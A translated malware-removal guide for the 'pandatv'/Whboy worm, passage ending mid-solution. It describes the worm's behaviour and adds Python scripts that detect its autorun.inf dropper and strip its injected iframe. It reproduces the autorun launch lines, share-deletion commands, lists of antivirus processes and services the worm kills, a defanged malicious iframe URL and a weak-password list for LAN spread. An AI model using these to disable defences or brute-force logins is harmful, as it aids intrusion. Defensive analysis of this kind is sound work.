Editor's note: This article describes the methods for removing pandatv and its variants, and the manual removal of pandatv. The virus paths covered include the spoclsv.exe and fuckjacks.exe variants, and the pandatv removal tool.
We strongly recommend that you pay attention to the following four points before removing pandatv:
- 1. This article includes descriptions of the two pandatv variants; check the virus symptoms and choose the corresponding detection and removal method.
- 2. For .exe executable files infected by the pandatv virus, we recommend that you back them up and repair them!
- 3. Retrieving the Ghost (.gho) files deleted by pandatv: for more information, see the linked article!
- 4. If you do not know much about computers, please clear the pandatv virus under expert guidance.
Pandatv Virus Variant 1: the virus runs as spoclsv.exe
This is one of the early variants of pandatv, notable for "killing anti-virus software"; worse, it infects every .exe file on all disks and deletes .gho files (Ghost image files).
Its most insidious move is appending a piece of code to the end of all htm/html/asp/php/jsp/aspx files that calls the virus. At present none of the dedicated removal tools or anti-virus products repair this; you must remove the appended code by hand, and be thorough, otherwise any webpage still carrying this code will cause reinfection.
The other, older "pandatv" spoclsv variants show fewer behaviors than this version and are not listed separately.
Virus description:
"Wuhan boys", also known as "pandatv incense", is an infectious worm that can infect files such as exe, com, pif, src, html, and asp in the system.Abort a large number of anti-virus software processesAndDelete a file with the extension gho,(. Gho is a GHOST backup file. All the. exe executable files in the infected user system were changed to the pandatv with three incense points.
[Image: the pandatv icon (not the original image)]
[Image: an infected program (actual screenshot)]
The following are the detailed behaviors of pandatv and the solutions:
Detailed behavior of the pandatv virus:
1. Copies itself to the system directory:
%System%\drivers\spoclsv.exe ("%System%" is the Windows directory, for example C:\Windows)
Different spoclsv.exe variants may use different directories. For example, the variant that broke out in December uses C:\WINDOWS\System32\Drivers\spoclsv.exe.
2. Creates a startup item:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare" = "%System%\drivers\spoclsv.exe"
3. Generate a virus copy in the root directory of each partition:
X:\setup.exe
X:\autorun.inf
autorun.inf content:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
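As an added example (not from the original article), the following Python script inspects a drive root for the autorun.inf/setup.exe pair described in step 3: it parses the [AutoRun] section, checks each launch key, and reports any that point at an executable actually present in that same root. The sample autorun.inf content and the temporary directory it is written to are constructed for the demonstration.

```python
import os
import tempfile

# Constructed sample of the autorun.inf described above (not copied from a live disk).
SAMPLE_AUTORUN = ("[AutoRun]\nOPEN=setup.exe\nshellexecute=setup.exe\n"
                  "shell\\Auto\\command=setup.exe\n")
# Keys through which autorun.inf can launch a program when the drive is opened.
LAUNCH_KEYS = ("open", "shellexecute", "shell\\auto\\command")

def parse_autorun(text):
    """Return {key_lower: value} for the [AutoRun] section of an autorun.inf."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
        elif in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def inspect_drive_root(root):
    """List (key, exe) pairs where autorun.inf launches an executable that also
    sits in the same drive root, which is exactly the pair this worm drops."""
    inf = os.path.join(root, "autorun.inf")
    if not os.path.isfile(inf):
        return []
    with open(inf, encoding="latin-1") as fh:
        entries = parse_autorun(fh.read())
    hits = []
    for key in LAUNCH_KEYS:
        target = entries.get(key)
        if not target:
            continue
        exe = target.split()[0].strip('"')  # drop arguments and quotes
        if exe.lower().endswith(".exe") and os.path.isfile(os.path.join(root, exe)):
            hits.append((key, exe))
    return hits

def demo():
    """Build a throwaway 'drive root' holding the dropped pair and inspect it."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "autorun.inf"), "w") as fh:
        fh.write(SAMPLE_AUTORUN)
    with open(os.path.join(root, "setup.exe"), "wb") as fh:
        fh.write(b"MZ placeholder, not a real executable")
    return inspect_drive_root(root)
```

Run inspect_drive_root() against each drive root (for example "D:\\") on a suspect machine; an empty list means no launch key points at a dropped executable.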
4. Uses the net share command to remove the administrative shares:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
5. Modifies the "Show all files and folders" option:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue" = dword:00000000
6. Tries to close the windows of the following security software and tools (matched by window title):
Skynet
Firewall
Process
VirusScan
NOD32
Netscape
Anti-Virus
Drug overlord
Rising
Jiang min
Huang shanie
Super Rabbit
Master of Optimization
Mmaqando
Moma scavenger
QQ Virus
Registry Editor
System Configuration Utility
Kaspersky Anti-Virus
Symantec AntiVirus
Duba
Windows Task Manager
Esteem procs
Green e PC
Password theft
PHG
Trojan helper Finder
System Safety Monitor
Wrapped gift Killer
Winsock Expert
Game Trojan Detection master
Super patrol
Msctls_statusbar32
Pjf (ustc)
IceSword
7. Tries to terminate security-software processes and Viking virus processes:
Mcshield.exe
VsTskMgr.exe
NaPrdMgr.exe
UpdaterUI.exe
TBMon.exe
Scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logocmd.exe
Logo_1.exe
Rundl132.exe
8. Disables security-software services:
Schedule
Sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
Kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
Navapsvc
Wscsvc
KPfwSvc
SNDSrvc
CcProxy
CcEvtMgr
CcSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
9. Deletes startup items related to security software:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ysponse
10. Traverses directories and modifies htm/html/asp/php/jsp/aspx and other webpage files, appending the following to the end of each file:
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"></iframe>
It does not modify webpage files in the following directories:
C:\WINDOWS
C:\WINNT
C:\system32
C:\Documents and Settings
C:\System Volume Information
C:\Recycled
Program Files\Windows NT
Program Files\WindowsUpdate
Program Files\Windows Media Player
Program Files\Outlook Express
Program Files\Internet Explorer
Program Files\NetMeeting
Program Files\Common Files
Program Files\ComPlus Applications
Program Files\Messenger
Program Files\InstallShield Installation Information
Program Files\MSN
Program Files\Microsoft Frontpage
Program Files\Movie Maker
Program Files\MSN Gaming Zone
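As an added example (not part of the original article), here is a Python cleaner for the appended tag from step 10: it walks a web root, skips the directory names the worm itself leaves alone, and strips the injected iframe from every htm/html/asp/php/jsp/aspx file. The sample page tree is constructed in a temporary directory; the URL is kept defanged (hxxp) as on the page, and the pattern also matches the live http:// form.

```python
import os
import re
import tempfile

# Constructed copy of the tag the worm appends (URL defanged, as on the page).
INJECTED_SAMPLE = (b'<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" '
                   b'width="0" height="0" frameborder="0"></iframe>\r\n')
# Matches http:// or defanged hxxp://, any case, tolerating stray whitespace.
IFRAME_RE = re.compile(
    rb'<iframe\s+src\s*=\s*"h[tx]{2}p\s*:\s*//\s*www\.ctv163\.com/wuhan/down\.htm"'
    rb'\s+width\s*=\s*"0"\s+height\s*=\s*"0"\s+frameborder\s*=\s*"0"\s*>\s*</iframe>\s*', re.IGNORECASE)
WEB_EXTS = {".htm", ".html", ".asp", ".php", ".jsp", ".aspx"}
# Directories the worm skips (simplified: matched by name anywhere in the tree, not only under C:\).
SKIP_DIRS = {"windows", "winnt", "system32", "program files", "recycled"}

def clean_file(path):
    """Strip every injected iframe from one file; return how many were removed."""
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, count = IFRAME_RE.subn(b"", data)
    if count:
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return count

def clean_tree(root):
    """Walk root; return {path: removed_count} for each web file that carried the tag."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d.lower() not in SKIP_DIRS]
        for name in filenames:
            if os.path.splitext(name)[1].lower() in WEB_EXTS:
                path = os.path.join(dirpath, name)
                count = clean_file(path)
                if count:
                    results[path] = count
    return results

def demo():
    """Constructed tree: one infected page, one clean page, one page in a skipped dir."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "site", "Windows"))
    infected = b"<html><body>hello</body></html>\r\n" + INJECTED_SAMPLE
    pages = {"site/index.htm": infected, "site/about.html": b"<html>clean</html>\n",
             "site/Windows/x.htm": infected}
    for rel, body in pages.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(body)
    cleaned = clean_tree(root)
    with open(os.path.join(root, "site", "index.htm"), "rb") as fh:
        return len(cleaned), IFRAME_RE.search(fh.read()) is None
```

Back up the web root before running clean_tree() on it, since the files are rewritten in place.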
11. Generates a Desktop_.ini file in each directory it visits; the content is the current date.
12. In addition, the virus tries to delete .gho files.
The virus also tries to copy itself to other computers in the LAN under the name GameSetup.exe, using the following weak passwords:
Password
Harley
Golf
Pussy
Mustang
Shadow
Fish
Qwerty
Baseball
Letmein
Ccc
Admin
Abc
Pass
Passwd
Database
Abcd
Abc123
Sybase
123qwe
Server
Computer
Super
123asd
Ihavenopass
Godblessyou
Enable
Alpha
1234 qwer
123abc
Aaa
Patrick
Pat
Administrator
Root
Sex
God
Fuckyou
Fuck
Test
Test123
Temp
Temp123
Win
Asdf
Pwd
Qwer
Yxcv
Zxcv
Home
Xxx
Owner
Login
Login
Love
Mypc
Mypc123
Admin123
Mypass
Mypass123
Administrator
Guest
Admin
Root
The virus file contains the following strings:
Whboy
*** 武*汉*男*生*感*染*下*载*者 *** (the characters of "Wuhan boy infection downloader", each separated by an asterisk)
Solution:
1. Stop the virus process:
%System%\drivers\spoclsv.exe
Different spoclsv.exe variants may sit in different directories. For example, the variant that broke out in December lives at C:\WINDOWS\System32\Drivers\spoclsv.exe, but the same method can be used to remove it.
Note: the similarly named spoolsv.exe in the system32 directory is a legitimate system file (the Windows print spooler); do not confuse it with spoclsv.exe. (No variant seen so far injects into a system process, but this cannot be ruled out for future variants.)
If spoclsv.exe is running, end it with the Super Rabbit Magic Settings tool.
2. Delete the virus file: